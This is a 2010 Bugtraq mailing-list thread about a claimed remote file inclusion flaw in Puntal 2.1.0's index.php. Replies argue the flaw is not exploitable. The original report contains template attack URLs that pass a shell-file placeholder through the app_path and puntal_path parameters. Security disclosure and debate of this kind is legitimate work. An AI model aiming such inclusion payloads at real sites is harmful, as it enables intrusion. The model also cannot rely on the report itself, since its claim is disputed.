Back to list
Puntal (index.php) Remote File Inclusion Vulnerabilities
May 03 2010 06:10PM
eidelweiss cyberservices com
RE: Puntal (index.php) Remote File Inclusion Vulnerabilities
May 03 2010 08:39PM
Tom Walsh - lists (mailinglist expresshosting net)
Re: Puntal (index.php) Remote File Inclusion Vulnerabilities
May 04 2010 05:15PM
Justin C. Klein Keane (justin madirish net)
-----BEGIN PGP SIGNED MESSAGE-----
I've found similar deficiencies in other "vulnerabilities" listed by
Justin C. Klein Keane
The digital signature on this message can be confirmed
using the public key at http://www.madirish.net/gpgkey
On 05/03/2010 04:39 PM, Tom Walsh - lists wrote:
> Both variables ($app_path and $puntal_path) are defined in the index.php
> file. As such they will never be overridden when the variables are passed
> via POST or GET. POST and GET variables are populated and placed into the
> global scope before the page is processed by the PHP processor engine
> (assuming register globals is enabled, which it hasn't been in a default PHP
> install in a long time).
> Line 29 of index.php: $app_path = '/';
> Line 41 of index.php: $puntal_path = dirname(__FILE__).$app_path;
> Additionally the following line (Line 43 of Index.php) calls a function
> specifically designed to unregister global variables in the global scope of
> the application.
> This is not an exploit. Never was.
> Nothing to see here... Move along.
>> -----Original Message-----
>> From: eidelweiss (at) cyberservices (dot) com [email concealed] [mailto:eidelweiss (at) cyberservices (dot) com [email concealed]]
>> Sent: Monday, May 03, 2010 1:10 PM
>> To: bugtraq (at) securityfocus (dot) com [email concealed]
>> Subject: Puntal (index.php) Remote File Inclusion Vulnerabilities
>> Puntal could allow a remote attacker to include malicious PHP files. A
>> attacker could send a specially-crafted URL request to the "index.php"
>> using the "app_path=" OR "puntal_path=" parameter to specify a malicious
>> file from a remote system, which would allow the attacker to execute
>> code on the vulnerable system.
>> Puntal 2.1.0 is vulnerable; other versions may also be affected.
>> An attacker can exploit these issues via a browser.
>> http://127.0.0.1//path/index.php?app_path= [inj3ct0r sh3ll]
>> http://127.0.0.1//path/index.php?puntal_path= [inj3ct0r sh3ll
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (GNU/Linux)
Comment: Using GnuPG with Fedora - http://enigmail.mozdev.org/
-----END PGP SIGNATURE-----
[ reply ]
Copyright 2010, SecurityFocus